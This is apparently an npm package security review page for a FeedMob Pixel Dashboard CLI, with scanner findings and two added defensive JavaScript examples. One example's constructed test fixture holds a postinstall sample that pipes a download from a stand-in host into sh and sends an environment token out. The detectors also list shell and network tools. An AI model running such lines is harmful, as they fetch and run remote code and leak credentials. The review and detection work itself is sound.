
@feedmob/feedmob-pixel-cli@0.1.2

FeedMob Pixel Dashboard data query CLI

AI Security Review

scanned 1d ago · by lpm-firewall-ai

No confirmed malicious attack surface. Package is a Dashboard API CLI; install-time behavior is limited to printing guidance, while network/file actions require user-invoked CLI commands.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install prints postinstall message; feedpix commands trigger API/config actions
Impact
Reads Dashboard API data and optionally writes local CLI config when requested by user.
Mechanism
user-invoked API client and optional local config writer
Rationale
Static source inspection shows package-aligned CLI behavior with no install-time mutation beyond stdout and no credential harvesting or covert exfiltration. Token use is for authenticated Dashboard API calls or explicit user-requested config storage.
Evidence
package.json
scripts/postinstall.cjs
dist/cli.js
dist/client.js
dist/config.js
dist/commands/init.js
dist/commands/records.js
dist/commands/request.js
dist/output.js
Network endpoints (1)
feedmob-pixel-dashboard.feedmob.com/

Decision evidence

public snapshot
AI called this Clean at 93.0% confidence as Benign with low false-positive risk.
Evidence for block
    Evidence against
    • package.json postinstall runs scripts/postinstall.cjs only; script prints setup/help text and does not write files or run commands.
    • dist/cli.js only builds commander CLI and dispatches user-invoked commands.
    • dist/client.js performs authenticated read-only GET/HEAD/fetch calls to configured Dashboard API paths and rejects absolute request paths.
    • dist/config.js reads env/config and writes ~/.feedpix/config.json only through explicit init command.
    • dist/output.js redacts bearer/token-like strings in error output.
    • No child_process, eval/vm/Function, native binary loading, persistence, or AI-agent control-surface writes found.
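The two client-side controls credited above (a request path that cannot change the origin of the authenticated call, and error output with bearer/token-like strings redacted) are the ones a reviewer should exercise rather than take on trust. The following is an added illustration written for this review page, not code from @feedmob/feedmob-pixel-cli: the base URL is the endpoint listed in this review, while the function names, the redaction patterns and the sample inputs are assumptions.

```javascript
// Added illustration of the two client-side checks credited in the review
// (dist/client.js rejects absolute request paths; dist/output.js redacts
// bearer/token-like strings). Written for this page, not the package's code.
// BASE_URL is the endpoint the review lists; function names are assumptions.
const BASE_URL = 'https://feedmob-pixel-dashboard.feedmob.com/';

// Resolve a caller-supplied path against the configured Dashboard base.
// Rejected: absolute URLs (any scheme), protocol-relative //host and \\host
// forms, and ".." climbs above the base path. The origin comparison is the
// real control; the regex only gives a clearer error for the obvious cases.
function resolveApiUrl(requestPath, baseUrl = BASE_URL) {
  if (typeof requestPath !== 'string' || requestPath.length === 0) {
    throw new TypeError('request path must be a non-empty string');
  }
  if (/^[a-z][a-z0-9+.-]*:/i.test(requestPath) || /^[\\/]{2}/.test(requestPath)) {
    throw new Error(`absolute request path rejected: ${requestPath}`);
  }
  const base = new URL(baseUrl);
  const resolved = new URL(requestPath.replace(/^\/+/, ''), base);
  if (resolved.origin !== base.origin || !resolved.pathname.startsWith(base.pathname)) {
    throw new Error(`request path escapes API base: ${requestPath}`);
  }
  return resolved.toString();
}

// Yes/no wrapper for callers that only need to know whether a path is safe.
function isRejectedPath(requestPath, baseUrl = BASE_URL) {
  try {
    resolveApiUrl(requestPath, baseUrl);
    return false;
  } catch {
    return true;
  }
}

// Scrub credential-shaped material before a message reaches stderr or a log:
// "Bearer <token>", token=/api_key=/secret= pairs in query strings or JSON,
// and any 32+ character opaque string (API keys, session ids).
function redactSecrets(text) {
  return String(text)
    .replace(/\b(bearer)\s+[A-Za-z0-9._~+/=-]+/gi, '$1 [REDACTED]')
    .replace(/\b(token|api[_-]?key|secret)(["']?\s*[:=]\s*["']?)[^"'&\s]+/gi, '$1$2[REDACTED]')
    .replace(/\b[A-Za-z0-9_-]{32,}\b/g, '[REDACTED]');
}

// Build the URL first, so a bad path never becomes a request that carries
// the bearer token; redact before printing any error that may echo headers.
function buildRequest(requestPath, token) {
  const url = resolveApiUrl(requestPath);
  return { method: 'GET', url, headers: { Authorization: `Bearer ${token}` } };
}

try {
  console.log(buildRequest('records?limit=5', 'example-token').url);
  buildRequest('https://evil.example/steal', 'example-token');
} catch (err) {
  console.error(redactSecrets(`request failed with Bearer example-token: ${err.message}`));
}
```

The origin check is what actually stops a config value or argument from redirecting the token to another host; the backslash case matters because the WHATWG URL parser treats `\\host` like `//host` for https. Redaction is a last line of defence for logs, not a substitute for never sending the token to the wrong origin.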
    Behavioral surface
    Source
    Environment Vars, Filesystem
    Supply chain
    High Entropy Strings, Url Strings
    Manifest
    No License
    scanned 17 file(s), 44.3 KB of source, external domains: feedmob-pixel-dashboard.feedmob.com, github.com

    Source & flagged code

    2 flagged
    package.json
    scripts.postinstall = node ./scripts/postinstall.cjs
    High
    Install Time Lifecycle Scripts

    Package defines install-time lifecycle scripts.

    scripts.postinstall = node ./scripts/postinstall.cjs
    Medium
    Ambiguous Install Lifecycle Script

    Install-time lifecycle script is not statically allowlisted and needs review.

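What "needs review" means in practice for the Medium finding: resolve the postinstall command to the file it runs, confirm that file is actually in the tarball, and scan it for the constructs the review reports as absent (child_process, eval/vm/Function, environment reads, network, filesystem writes). The following is added reviewer tooling written for this page, not part of the package. The sample manifest mirrors the flagged scripts.postinstall entry; the two stand-in postinstall sources are constructed, and the suspicious one is only a negative test case showing what a script that should fail review looks like, not anything found in this package.

```javascript
// Added example: triage of a flagged install-time lifecycle script. Reviewer
// tooling written for this page, not code from the package. The manifest and
// both postinstall sources below are constructed test inputs.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Constructed manifest mirroring the flagged scripts.postinstall entry.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: '@feedmob/feedmob-pixel-cli',
  version: '0.1.2',
  scripts: { postinstall: 'node ./scripts/postinstall.cjs', build: 'tsc' },
});

// Constructed stand-ins for the referenced script: one that only prints
// guidance (the behaviour the review describes) and one that must fail.
const BENIGN_SOURCE = `
console.log('feedpix installed. Run "feedpix init" to store a Dashboard token.');
`;
const SUSPICIOUS_SOURCE = `
const { execSync } = require('child_process');
const https = require('https');
execSync('curl -s https://example.invalid/s | sh');
https.request({ host: 'example.invalid', path: '/?t=' + process.env.FEEDPIX_TOKEN }).end();
`;

// Static signals that have no business in a postinstall script.
const RISKY_PATTERNS = [
  ['child_process', /\bchild_process\b|\bexecSync\b|\bspawn(Sync)?\b/],
  ['dynamic-code', /\beval\s*\(|\bnew\s+Function\b|\brequire\(['"]vm['"]\)/],
  ['env-read', /\bprocess\.env\b/],
  ['network', /\brequire\(['"](https?|net|dgram)['"]\)|\bfetch\s*\(|https?:\/\//],
  ['fs-write', /\bfs\.(write|append|mkdir|chmod|rename)\w*\s*\(/],
];

// 1. Which install-time hooks does the manifest define? npm runs these three
//    on the consumer's machine during `npm install`.
function installHooks(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// 2. Can the command be resolved statically to one local script file?
//    Shell operators, downloaders or variable expansion mean the real
//    behaviour is not visible in the tarball, so the answer is "review".
function resolveLocalScript(command) {
  const m = /^node\s+(\.\/[\w./-]+\.(?:c?js|mjs))\s*$/.exec(command.trim());
  if (!m || /[|&;$`]|\bcurl\b|\bwget\b/.test(command)) return null;
  return m[1];
}

// 3. Scan the referenced source for the risky signals.
function scanSource(source) {
  return RISKY_PATTERNS.filter(([, re]) => re.test(source)).map(([name]) => name);
}

// One verdict per install hook: clean, block, or review (cannot decide statically).
function triage(packageJsonText, fileContents) {
  return installHooks(packageJsonText).map(({ hook, command }) => {
    const file = resolveLocalScript(command);
    if (!file) return { hook, command, verdict: 'review', reason: 'command not statically resolvable' };
    const source = fileContents[file];
    if (source === undefined) return { hook, command, verdict: 'review', reason: `${file} missing from tarball` };
    const signals = scanSource(source);
    return { hook, command, file, signals, verdict: signals.length ? 'block' : 'clean' };
  });
}

const benign = triage(SAMPLE_PACKAGE_JSON, { './scripts/postinstall.cjs': BENIGN_SOURCE });
const suspicious = triage(SAMPLE_PACKAGE_JSON, { './scripts/postinstall.cjs': SUSPICIOUS_SOURCE });
console.log(JSON.stringify({ benign, suspicious }, null, 2));
```

The distinction between "review" and "block" is the point: a postinstall that pipes a download into a shell, or reads a file that is not in the tarball, cannot be cleared by static inspection at all, whereas a plain `node ./scripts/x.cjs` can be read and either cleared or blocked on what it contains.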

    Findings

    1 High, 2 Medium, 6 Low
    High: Install Time Lifecycle Scripts (package.json)
    Medium: Ambiguous Install Lifecycle Script (package.json)
    Medium: Environment Vars
    Low: Non Install Lifecycle Scripts
    Low: Scripts Present
    Low: Filesystem
    Low: High Entropy Strings
    Low: Url Strings
    Low: No License